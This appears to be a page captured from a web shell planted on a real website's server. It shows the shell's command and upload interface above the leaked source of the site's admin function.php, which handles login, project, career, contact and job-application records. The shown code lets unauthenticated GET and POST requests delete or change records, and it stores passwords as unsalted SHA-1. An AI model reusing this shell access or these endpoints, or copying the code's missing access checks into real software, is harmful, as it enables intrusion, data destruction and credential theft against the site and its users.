
___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :

ikan Uploader :
Directory :  /home/ni05r7l36tus/www/annapurnaed.com/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //home/ni05r7l36tus/www/annapurnaed.com/admin/function.php
<?php
include "connection/config.php"; // Make sure $pdo and $uploadDir are defined
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
    $username = trim($_POST['username']);
    $password = $_POST['password'];

    if (empty($username) || empty($password)) {
        die("Please enter both username and password.");
    }

    $stmt = $pdo->prepare("SELECT id, username, password FROM users WHERE username = :username LIMIT 1");
    $stmt->bindParam(':username', $username, PDO::PARAM_STR);
    $stmt->execute();

    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($user) {
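        // Hash the input password with SHA1.
        // Note: unsalted SHA-1 is a weak password hash; migrating the stored
        // hashes to password_hash()/password_verify() is the proper fix.
        $inputHashedPassword = sha1($password);

        // Compare hashed passwords in constant time
        if (hash_equals((string) $user['password'], $inputHashedPassword)) {
            // Password matches: rotate the session ID to prevent session fixation
            session_regenerate_id(true);
            $_SESSION['user_id'] = $user['id'];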
            $_SESSION['username'] = $user['username'];
            header("Location: index.php");
            exit;
        } else {
            echo "Invalid username or password.";
        }
    } else {
        echo "Invalid username or password.";
    }
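}
// No "Invalid request." branch here: this file also handles the non-login
// actions below, and echoing output first would break their header() redirects.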


$uploadDir = __DIR__ . "/../upload/";
if (!is_dir($uploadDir)) {
    mkdir($uploadDir, 0755, true); // 0777 would make the upload directory world-writable
}
// ---------- ADD PROJECT ----------
if (isset($_POST['add_project'])) {
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $pagetitle     = htmlspecialchars($_POST['page_title'] ?? '');
    $client        = htmlspecialchars($_POST['client'] ?? '');
    $company       = htmlspecialchars($_POST['company'] ?? '');
    $location      = htmlspecialchars($_POST['location'] ?? '');
    $projecttype   = htmlspecialchars($_POST['project_type'] ?? '');
    $allowed_tags = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description1 = strip_tags($_POST['description1'] ?? '', $allowed_tags);
    $description2  =strip_tags($_POST['description2'] ?? '', $allowed_tags);
    $description3  =strip_tags($_POST['description3'] ?? '', $allowed_tags);
    $description4  =strip_tags($_POST['description4'] ?? '', $allowed_tags);
    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $keyword       = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription= htmlspecialchars($_POST['meta_description'] ?? '');

    // Handle WebP uploads
    $images = [];
    foreach (['image', 'image1', 'image2'] as $fileKey) {
        if (!empty($_FILES[$fileKey]['name'])) {
            $imageTmp = $_FILES[$fileKey]['tmp_name'];
            $imageExt = strtolower(pathinfo($_FILES[$fileKey]['name'], PATHINFO_EXTENSION));
            // Random name: rand(10, 100) . time() can repeat for files uploaded in the same request
            $newName  = bin2hex(random_bytes(8)) . '.webp';
            $destPath = $uploadDir . $newName;

            // Convert to WebP
            switch ($imageExt) {
                case 'jpg':
                case 'jpeg':
                    $src = imagecreatefromjpeg($imageTmp);
                    break;
                case 'png':
                    $src = imagecreatefrompng($imageTmp);
                    imagepalettetotruecolor($src);
                    imagealphablending($src, true);
                    imagesavealpha($src, true);
                    break;
                case 'gif':
                    $src = imagecreatefromgif($imageTmp);
                    break;
                case 'webp': // Support WebP input
                    $src = imagecreatefromwebp($imageTmp);
                    break;
                default:
                    $src = false;
            }

            if ($src !== false) {
                imagewebp($src, $destPath, 80);
                imagedestroy($src);
                $images[$fileKey] = $newName;
            } else {
                $images[$fileKey] = null;
            }
        } else {
            $images[$fileKey] = null;
        }
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO `project`
            (`title`, `image`, `page_title`, `client`, `company`, `location`, `project_type`,
             `description1`, `description2`, `description3`, `description4`,
             `image1`, `image2`, `slug`, `keyword`, `metatitle`, `seodescription`)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
        ");

        $stmt->execute([
            $title,
            $images['image'],
            $pagetitle,
            $client,
            $company,
            $location,
            $projecttype,
            $description1,
            $description2,
            $description3,
            $description4,
            $images['image1'],
            $images['image2'],
            $slug,
            $keyword,
            $metatitle,
            $seodescription
        ]);

        header("Location: project.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}


// ---------- UPDATE PROJECT ----------
if (isset($_POST['update_project'])) {
    $id            = intval($_POST['id']);
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $pagetitle     = htmlspecialchars($_POST['page_title'] ?? '');
    $client        = htmlspecialchars($_POST['client'] ?? '');
    $company       = htmlspecialchars($_POST['company'] ?? '');
    $location      = htmlspecialchars($_POST['location'] ?? '');
    $projecttype   = htmlspecialchars($_POST['project_type'] ?? '');
    $allowed_tags = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description1 = strip_tags($_POST['description1'] ?? '', $allowed_tags);
    $description2  =strip_tags($_POST['description2'] ?? '', $allowed_tags);
    $description3  =strip_tags($_POST['description3'] ?? '', $allowed_tags);
    $description4  =strip_tags($_POST['description4'] ?? '', $allowed_tags);

    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $metakeyword   = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription= htmlspecialchars($_POST['meta_description'] ?? '');

    // Folder for uploads
    $uploadDir = __DIR__ . "/../upload/";

    // Get old images from DB
    $stmt = $pdo->prepare("SELECT image, image1, image2 FROM project WHERE id = ?");
    $stmt->execute([$id]);
    $oldImages = $stmt->fetch(PDO::FETCH_ASSOC);

    $images = [];
    foreach (['image', 'image1', 'image2'] as $fileKey) {
        if (!empty($_FILES[$fileKey]['name'])) {
            $imageTmp = $_FILES[$fileKey]['tmp_name'];
            $imageExt = strtolower(pathinfo($_FILES[$fileKey]['name'], PATHINFO_EXTENSION));
            // Always save as .webp; random name, since rand(10, 100) . time() can repeat within one request
            $newName  = bin2hex(random_bytes(8)) . '.webp';
            $destPath = $uploadDir . $newName;

            // Convert image to WebP
            switch ($imageExt) {
                case 'jpg':
                case 'jpeg':
                    $src = imagecreatefromjpeg($imageTmp);
                    break;
                case 'png':
                    $src = imagecreatefrompng($imageTmp);
                    imagepalettetotruecolor($src);
                    imagealphablending($src, true);
                    imagesavealpha($src, true);
                    break;
                case 'gif':
                    $src = imagecreatefromgif($imageTmp);
                    break;
                case 'webp': // Support WebP input
                    $src = imagecreatefromwebp($imageTmp);
                    break;
                default:
                    $src = false;
            }

            if ($src !== false) {
                if (imagewebp($src, $destPath, 80)) {
                    // ✅ Delete old file if exists
                    if (!empty($oldImages[$fileKey]) && file_exists($uploadDir . $oldImages[$fileKey])) {
                        unlink($uploadDir . $oldImages[$fileKey]);
                    }
                    $images[$fileKey] = $newName;
                } else {
                    $images[$fileKey] = $oldImages[$fileKey] ?? null;
                }
                imagedestroy($src);
            } else {
                $images[$fileKey] = $oldImages[$fileKey] ?? null;
            }
        } else {
            $images[$fileKey] = $oldImages[$fileKey] ?? null;
        }
    }

    try {
        $stmt = $pdo->prepare("UPDATE project SET 
            title=?, page_title=?, client=?, company=?, location=?, project_type=?, 
            description1=?, description2=?, description3=?, description4=?, 
            slug=?, keyword=?, metatitle=?, seodescription=?, 
            image=?, image1=?, image2=? 
            WHERE id=?");

        $stmt->execute([
            $title, $pagetitle, $client, $company, $location, $projecttype,
            $description1, $description2, $description3, $description4,
            $slug, $metakeyword, $metatitle, $seodescription,
            $images['image'], $images['image1'], $images['image2'],
            $id
        ]);

        header("Location: project.php?updated=1");
        exit;
    } catch (PDOException $e) {
        echo "Update Error: " . $e->getMessage();
    }
}

// ---------- DELETE PROJECT ----------

if (isset($_GET['slug'])) {
    $slug = $_GET['slug'];

    // 1. Get the project by slug
    $stmt = $pdo->prepare("SELECT id, image, image1, image2 FROM project WHERE slug = ?");
    $stmt->execute([$slug]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row) {
        // 2. Delete images if they exist
        foreach (['image', 'image1', 'image2'] as $imgKey) {
            $filePath = $uploadDir . $row[$imgKey];
            if (!empty($row[$imgKey]) && file_exists($filePath)) {
                unlink($filePath);
            }
        }

        // 3. Delete database record
        $stmt = $pdo->prepare("DELETE FROM project WHERE slug = ?");
        $stmt->execute([$slug]);

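        // 4. Redirect (only to a local .php page, to avoid an open redirect)
        $redirect = $_GET['redirect'] ?? 'project.php';
        if (!is_string($redirect) || !preg_match('/^[A-Za-z0-9_-]+\.php$/', $redirect)) {
            $redirect = 'project.php';
        }
        header("Location: " . $redirect . "?deleted=1");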
        exit;
    } else {
        echo "❌ No project found with slug: " . htmlspecialchars($slug);
    }
}


//--------add contact---------//
if (isset($_REQUEST['add_contact'])) {

    // Sanitize and validate inputs
    $name = isset($_REQUEST['name']) ? htmlspecialchars(trim($_REQUEST['name'])) : '';
    $email = isset($_REQUEST['email']) ? htmlspecialchars(trim($_REQUEST['email'])) : '';
    $phone = isset($_REQUEST['phone']) ? htmlspecialchars(trim($_REQUEST['phone'])) : '';
    $subject = isset($_REQUEST['subject']) ? htmlspecialchars(trim($_REQUEST['subject'])) : '';
    $message = isset($_REQUEST['message']) ? htmlspecialchars(trim($_REQUEST['message'])) : '';

    try {
        $stmt = $pdo->prepare("INSERT INTO `contact` (`name`, `email`, `phone`,`subject`, `message`) VALUES (:name, :email, :phone, :subject, :message)");
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':email', $email);
        $stmt->bindParam(':phone', $phone);
        $stmt->bindParam(':subject', $subject);
        $stmt->bindParam(':message', $message);
        
       if ($stmt->execute()) {
    echo "<script>
            alert('Submitted successfully');
            window.location.href = 'https://annapurnaed.com/contact.php';
          </script>";
    exit();
}


    } catch (PDOException $e) {
        echo "Error: " . $e->getMessage();
    }
}
if (isset($_GET['status']) && $_GET['status'] === 'success') {
    echo "<script>alert('Submitted successfully');</script>";
}



// ------------- DELETE Contact ---------------
if (isset($_GET['action']) && $_GET['action'] === 'delete_contact') {
    $id = intval($_GET['id']); // sanitize

    try {
        $stmt = $pdo->prepare("DELETE FROM `contact` WHERE `id` = ?");
        $stmt->execute([$id]);

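        // Redirect back to the given page (only a local .php page, to avoid an open redirect)
        $redirect = $_GET['redirect'] ?? 'contact.php';
        if (!is_string($redirect) || !preg_match('/^[A-Za-z0-9_-]+\.php$/', $redirect)) {
            $redirect = 'contact.php';
        }
        header("Location: " . $redirect);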
        exit();
    } catch (PDOException $e) {
        echo "Error deleting contact: " . $e->getMessage();
    }
}

if (isset($_POST['website_update_data'])) {
    $id = intval($_POST['id'] ?? 0);
    if ($id <= 0) {
        die("Invalid ID");
    }

    // Sanitize inputs
    $site_title       = htmlspecialchars(trim($_POST['site_title'] ?? ''));
    $email1           = htmlspecialchars(trim($_POST['email1'] ?? ''));
    $email2           = htmlspecialchars(trim($_POST['email2'] ?? ''));
    $address1         = htmlspecialchars(trim($_POST['address1'] ?? ''));
    $address2         = htmlspecialchars(trim($_POST['address2'] ?? ''));
    $address3         = htmlspecialchars(trim($_POST['address3'] ?? ''));
    $phone1           = htmlspecialchars(trim($_POST['phone1'] ?? ''));
    $phone2           = htmlspecialchars(trim($_POST['phone2'] ?? ''));
    $facebook         = htmlspecialchars(trim($_POST['facebook'] ?? ''));
    $twitter          = htmlspecialchars(trim($_POST['twitter'] ?? ''));
    $linkedin         = htmlspecialchars(trim($_POST['linkedin'] ?? ''));
    $meta_title       = htmlspecialchars(trim($_POST['meta_title'] ?? ''));
    $meta_description = htmlspecialchars(trim($_POST['meta_description'] ?? ''));
    $meta_keywords    = htmlspecialchars(trim($_POST['meta_keywords'] ?? ''));

    // Folder for uploads
    $uploadDir = __DIR__ . "/../upload/";
    if (!is_dir($uploadDir)) {
        mkdir($uploadDir, 0755, true);
    }

    // Get old image from DB (assuming image is stored in site_setting)
    $stmt = $pdo->prepare("SELECT logo FROM site_setting WHERE id = ?");
    $stmt->execute([$id]);
    $oldImage = $stmt->fetchColumn();

    $newImageName = $oldImage; // default if no new image uploaded

    if (!empty($_FILES['logo']['name']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {
        $imageTmp = $_FILES['logo']['tmp_name'];
        $imageExt = strtolower(pathinfo($_FILES['logo']['name'], PATHINFO_EXTENSION));
        $newName  = rand(10, 100) . time() . '.webp'; // save as .webp
        $destPath = $uploadDir . $newName;

        // Convert image to WebP
        switch ($imageExt) {
            case 'jpg':
            case 'jpeg':
                $src = imagecreatefromjpeg($imageTmp);
                break;
            case 'png':
                $src = imagecreatefrompng($imageTmp);
                imagepalettetotruecolor($src);
                imagealphablending($src, true);
                imagesavealpha($src, true);
                break;
            case 'gif':
                $src = imagecreatefromgif($imageTmp);
                break;
            case 'webp':
                $src = imagecreatefromwebp($imageTmp);
                break;
            default:
                $src = false;
        }

        if ($src !== false) {
            if (imagewebp($src, $destPath, 80)) {
                // Delete old image if exists
                if (!empty($oldImage) && file_exists($uploadDir . $oldImage)) {
                    unlink($uploadDir . $oldImage);
                }
                $newImageName = $newName;
            }
            imagedestroy($src);
        }
    }

    // Prepare UPDATE statement including image field
    $stmt = $pdo->prepare("UPDATE site_setting SET
            site_title = :site_title,
            email1 = :email1,
            email2 = :email2,
            address1 = :address1,
            address2 = :address2,
            address3 = :address3,
            phone1 = :phone1,
            phone2 = :phone2,
            facebook = :facebook,
            twitter = :twitter,
            linkedin = :linkedin,
            meta_title = :meta_title,
            meta_description = :meta_description,
            meta_keywords = :meta_keywords,
            logo = :logo
            WHERE id = :id
        ");

    $stmt->execute([
        ':site_title'       => $site_title,
        ':email1'           => $email1,
        ':email2'           => $email2,
        ':address1'         => $address1,
        ':address2'         => $address2,
        ':address3'         => $address3,
        ':phone1'           => $phone1,
        ':phone2'           => $phone2,
        ':facebook'         => $facebook,
        ':twitter'          => $twitter,
        ':linkedin'         => $linkedin,
        ':meta_title'       => $meta_title,
        ':meta_description' => $meta_description,
        ':meta_keywords'    => $meta_keywords,
        ':logo'            => $newImageName,
        ':id'               => $id,
    ]);

    if ($stmt->errorCode() !== '00000') {
        $err = $stmt->errorInfo();
        die("SQL error: " . $err[2]);
    }

    header("Location: site_setting.php");
    exit;
}

// ---------- ADD CAREER ----------
if (isset($_POST['add_career'])) {
    $position       = htmlspecialchars($_POST['position'] ?? '');
    $short_desc     = htmlspecialchars($_POST['short_description'] ?? '');
    $role_overview  = strip_tags($_POST['role_overview'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $responsibility = strip_tags($_POST['responsibility'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $salary         = htmlspecialchars($_POST['salary'] ?? '');
    $location       = htmlspecialchars($_POST['location'] ?? '');
    $job_type       = htmlspecialchars($_POST['job_type'] ?? '');
    $experience     = htmlspecialchars($_POST['experience'] ?? '');
    $vacancy        = (int)($_POST['vacancy'] ?? 0);

    $slug           = htmlspecialchars($_POST['slug'] ?? '');
    $keyword        = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle      = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription = htmlspecialchars($_POST['meta_description'] ?? '');

    // Image Upload (optional)
    $image = null;
    if (!empty($_FILES['image']['name'])) {
        $imageTmp = $_FILES['image']['tmp_name'];
        $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
        $newName  = rand(10, 100) . time() . '.webp';
        $destPath = $uploadDir . $newName;

        switch ($imageExt) {
            case 'jpg':
            case 'jpeg':
                $src = imagecreatefromjpeg($imageTmp);
                break;
            case 'png':
                $src = imagecreatefrompng($imageTmp);
                imagepalettetotruecolor($src);
                imagealphablending($src, true);
                imagesavealpha($src, true);
                break;
            case 'gif':
                $src = imagecreatefromgif($imageTmp);
                break;
            case 'webp':
                $src = imagecreatefromwebp($imageTmp);
                break;
            default:
                $src = false;
        }

        if ($src !== false) {
            imagewebp($src, $destPath, 80);
            imagedestroy($src);
            $image = $newName;
        }
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO `careers`
            (`position`, `short_description`, `role_overview`, `responsibility`, `salary`, `location`, `job_type`, `experience`, `vacancy`,
             `image`, `slug`, `keyword`, `metatitle`, `seodescription`)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
        ");

        $stmt->execute([
            $position,
            $short_desc,
            $role_overview,
            $responsibility,
            $salary,
            $location,
            $job_type,
            $experience,
            $vacancy,
            $image,
            $slug,
            $keyword,
            $metatitle,
            $seodescription
        ]);

        header("Location: careers.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}

// ---------- UPDATE CAREER ----------
if (isset($_POST['update_career'])) {
    $id             = (int)($_POST['id'] ?? 0);
    $position       = htmlspecialchars($_POST['position'] ?? '');
    $short_desc     = htmlspecialchars($_POST['short_description'] ?? '');
    $role_overview  = strip_tags($_POST['role_overview'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $responsibility = strip_tags($_POST['responsibility'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $salary         = htmlspecialchars($_POST['salary'] ?? '');
    $location       = htmlspecialchars($_POST['location'] ?? '');
    $job_type       = htmlspecialchars($_POST['job_type'] ?? '');
    $experience     = htmlspecialchars($_POST['experience'] ?? '');
    $vacancy        = (int)($_POST['vacancy'] ?? 0);

    $slug           = htmlspecialchars($_POST['slug'] ?? '');
    $keyword        = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle      = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription = htmlspecialchars($_POST['meta_description'] ?? '');

    // Keep old image unless a new one is uploaded
    $stmtOld = $pdo->prepare("SELECT image FROM careers WHERE id = ?");
    $stmtOld->execute([$id]);
    $oldImage = $stmtOld->fetchColumn();
    $image = $oldImage;

    if (!empty($_FILES['image']['name'])) {
        $imageTmp = $_FILES['image']['tmp_name'];
        $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
        $newName  = rand(10, 100) . time() . '.webp';
        $destPath = $uploadDir . $newName;

        switch ($imageExt) {
            case 'jpg':
            case 'jpeg':
                $src = imagecreatefromjpeg($imageTmp);
                break;
            case 'png':
                $src = imagecreatefrompng($imageTmp);
                imagepalettetotruecolor($src);
                imagealphablending($src, true);
                imagesavealpha($src, true);
                break;
            case 'gif':
                $src = imagecreatefromgif($imageTmp);
                break;
            case 'webp':
                $src = imagecreatefromwebp($imageTmp);
                break;
            default:
                $src = false;
        }

        if ($src !== false) {
            imagewebp($src, $destPath, 80);
            imagedestroy($src);
            $image = $newName;
        }
    }

    try {
        $stmt = $pdo->prepare("
            UPDATE `careers`
            SET `position`=?, `short_description`=?, `role_overview`=?, `responsibility`=?, `salary`=?, 
                `location`=?, `job_type`=?, `experience`=?, `vacancy`=?, `image`=?, `slug`=?, 
                `keyword`=?, `metatitle`=?, `seodescription`=?
            WHERE id=?
        ");

        $stmt->execute([
            $position,
            $short_desc,
            $role_overview,
            $responsibility,
            $salary,
            $location,
            $job_type,
            $experience,
            $vacancy,
            $image,
            $slug,
            $keyword,
            $metatitle,
            $seodescription,
            $id
        ]);

        header("Location: careers.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}


// ---------- DELETE CAREER ----------
if (isset($_GET['delete_career'])) {
    $id = (int)$_GET['delete_career'];

    // Optional: Delete associated image
    $stmtImg = $pdo->prepare("SELECT image FROM careers WHERE id=?");
    $stmtImg->execute([$id]);
    $imagePath = $stmtImg->fetchColumn();
    if ($imagePath && file_exists($uploadDir . $imagePath)) {
        unlink($uploadDir . $imagePath);
    }

    try {
        $stmt = $pdo->prepare("DELETE FROM careers WHERE id=?");
        $stmt->execute([$id]);
        header("Location: careers.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}

// -------- ADD Job Application -------- //
if (isset($_REQUEST['apply_job'])) {

    // Sanitize and validate inputs
    $name    = isset($_REQUEST['name']) ? htmlspecialchars(trim($_REQUEST['name'])) : '';
    $email   = isset($_REQUEST['email']) ? htmlspecialchars(trim($_REQUEST['email'])) : '';
    $phone   = isset($_REQUEST['phone']) ? htmlspecialchars(trim($_REQUEST['phone'])) : '';
    $position = isset($_REQUEST['position']) ? htmlspecialchars(trim($_REQUEST['position'])) : '';
    $message = isset($_REQUEST['message']) ? htmlspecialchars(trim($_REQUEST['message'])) : '';

    // Handle resume upload (optional)
    $resume = null;
    if (!empty($_FILES['resume']['name'])) {
        $allowed_ext = ['pdf', 'doc', 'docx'];
        $ext = strtolower(pathinfo($_FILES['resume']['name'], PATHINFO_EXTENSION));

        if (in_array($ext, $allowed_ext)) {
            $newName = time() . '_' . preg_replace("/[^a-zA-Z0-9.]/", "_", $_FILES['resume']['name']);
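            // Build the path from $uploadDir; "/../upload/" on its own resolves to /upload at the filesystem root
            $uploadPath = $uploadDir . $newName;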

            if (move_uploaded_file($_FILES['resume']['tmp_name'], $uploadPath)) {
                $resume = $newName;
            }
        }
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO `job_applications` (`name`, `email`, `phone`, `position`, `message`, `resume`) 
            VALUES (:name, :email, :phone, :position, :message, :resume)
        ");
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':email', $email);
        $stmt->bindParam(':phone', $phone);
        $stmt->bindParam(':position', $position);
        $stmt->bindParam(':message', $message);
        $stmt->bindParam(':resume', $resume);

        if ($stmt->execute()) {
            echo "<script>
                    alert('Application submitted successfully');
                    window.location.href = 'job_applly_form.php';
                  </script>";
            exit();
        }
    } catch (PDOException $e) {
        echo "Error: " . $e->getMessage();
    }
}

// ------------- DELETE Job Application --------------- //
if (isset($_GET['action']) && $_GET['action'] === 'delete_apply') {
    $id = intval($_GET['id']); // sanitize

    try {
        $stmt = $pdo->prepare("DELETE FROM `job_applications` WHERE `id` = ?");
        $stmt->execute([$id]);

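        // Only redirect to a local .php page, to avoid an open redirect
        $redirect = $_GET['redirect'] ?? 'job_applly_form.php';
        if (!is_string($redirect) || !preg_match('/^[A-Za-z0-9_-]+\.php$/', $redirect)) {
            $redirect = 'job_applly_form.php';
        }
        header("Location: " . $redirect);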
        exit();
    } catch (PDOException $e) {
        echo "Error deleting application: " . $e->getMessage();
    }
}


?>
